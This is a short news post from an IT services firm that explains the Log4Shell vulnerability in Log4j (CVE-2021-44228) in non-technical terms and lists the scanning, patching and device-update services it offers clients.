Latest news

LOG4SHELL Vulnerability

By Chris Wilson

IN BRIEF: WHAT IS IT?

Lots of IT eqiupment uses software written in a language called Java. It’s particularly common in devices with embedded systems, including those with web-based admin interfaces.

It’s normal for software developers to re-use common code to achieve common tasks. There’s a code library called Log4j which is used by lots of systems for creating log files.

The problem is:

  1. This library has a vulnerability in it, whereby if an attacker does something that they know will be recorded in the log file, they can craft that action in such a way as to run their own commands on your web server; and
  2. The details on how to exploit this were made public before a fix was available (a ‘zero day’ exploit).

The vulnerability is called Log4Shell because the upshot is that the attacker can run code on your vulnerable system as if they had command line (shell) access to it, exploiting the weakness in Log4j.

WHAT CAN WE DO FOR YOU?

For our clients, we can do the following:

  • Find equipment on your network that’s vulnerable to the exploit
  • Patch the vulnerability in systems provided the manufacturer has released a fix
  • Update infrastructure devices (such as wireless access points) which are running vulnerable software or firmware

Equipment that is old and out-of-support will not have updates written for it. These devices will be infeasible to make secure.

There are certain techniques (e.g. firewall updates) which can be used to limit the usefulness of the vulnerability, but the the range of knock-on choices available to the hacker is so great that the only proper mitigation is to patch or shut down the affected devices.

REFERENCES

Log4Shell is also known as NVD – CVE-2021-44228 (nist.gov)

Naked Security Blog (Sophos)